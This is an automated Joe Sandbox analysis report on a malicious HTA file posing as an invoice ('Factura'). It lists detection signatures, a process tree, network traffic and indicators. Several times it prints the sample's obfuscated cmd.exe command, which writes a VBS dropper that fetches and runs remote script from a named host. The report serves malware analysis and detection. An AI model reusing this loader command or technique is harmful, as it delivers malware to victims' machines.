Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura - XwgyvMuOAO.hta

Overview

General Information

Sample name:Factura - XwgyvMuOAO.hta
Analysis ID:1493145
MD5:65e0b29205432c93c11211a9aa474ff6
SHA1:1bcb0125fb5fb63460536b33e7b708479d5fb334
SHA256:b7f0fa3e60b9984e1f79cb3554efc7c5c8437d79d4a74ff02ab3d1e34539f87d
Tags:htaHUN
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Command shell drops VBS files
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 3788 cmdline: mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 728 cmdline: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3424 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 5352 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6476 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 6188 cmdline: C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • cmd.exe (PID: 3356 cmdline: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wscript.exe (PID: 2220 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" MD5: FF00E0480075B095948000BDC66E81F0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, CommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 3788, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ProcessId: 728, ProcessName: cmd.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe
Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5352, TargetFilename: C:\Users\Public\uoxx0.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 92.205.57.102, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 2220, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49706
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3356, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" , ProcessId: 2220, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://102.57.205.92.host.secureserver.net/g1/1Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHOAvira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/JAvira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net//g1Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net//g1QAvira URL Cloud: Label: malware
Source: hTTps://102.57.205.92.host.secureserver.net//Avira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/eAvira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/BAvira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQICAvira URL Cloud: Label: malware
Source: hTTps://102.57.205.92.host.secureserver.net//gAvira URL Cloud: Label: malware
Source: https://102.57.205.92.host.secureserver.net/g1/Avira URL Cloud: Label: malware
Source: Factura - XwgyvMuOAO.htaReversingLabs: Detection: 26%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.6% probability
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.5:49706 version: TLS 1.2

Networking

barindex
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET //g1 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /g1/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 102.57.205.92.host.secureserver.netConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 102.57.205.92.host.secureserver.net
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.secureserver.
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//g
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.secureserver.net//g1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.host.secureserverM2
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.205.92.hostC
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.57.graphy
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hTTps://102.5701
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A57000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net//g1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net//g1Q
Source: wscript.exe, 00000009.00000002.2067668967.0000000002AC6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2067188784.0000000002AC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/QKFQKFQKFQKFQKFQKFQKFQKFQKFQKFQFQICQICQIC
Source: wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmp, g1[1].htm.9.drString found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/
Source: wscript.exe, 00000009.00000003.2052587425.0000000002ACE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/1
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/B
Source: wscript.exe, 00000009.00000003.2063537527.0000000002ACE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/J
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/g1/e
Source: wscript.exe, 00000009.00000002.2067668967.0000000002A9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://102.57.205.92.host.secureserver.net/jgseaHOSHOSHO
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownHTTPS traffic detected: 92.205.57.102:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal96.evad.winHTA@17/3@1/1
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\uoxx0.vbsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2888:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Factura - XwgyvMuOAO.htaReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Factura - XwgyvMuOAO.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO^">C:\\Users\\Public\\uoxx0.vbs&echo|set /p=^"bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")^">>C:\\Users\\Public\\uoxx0.vbs&c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OwCBGE=".":MwPd="i":Aym5="g":Bzb2EN=":":GetO" 1>C:\\Users\\Public\\uoxx0.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("sCr"+MwPd+"pt"+Bzb2EN+"hT"+"Tps"+Bzb2EN+"//102"+OwCBGE+"57"+OwCBGE+"205"+OwCBGE+"92"+OwCBGE+"host"+OwCBGE+"secureserver"+OwCBGE+"net//"+Aym5+"1")" 1>>C:\\Users\\Public\\uoxx0.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\\windows\\system32\\cmd.exe /c start C:\\Users\\Public\\uoxx0.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\uoxx0.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
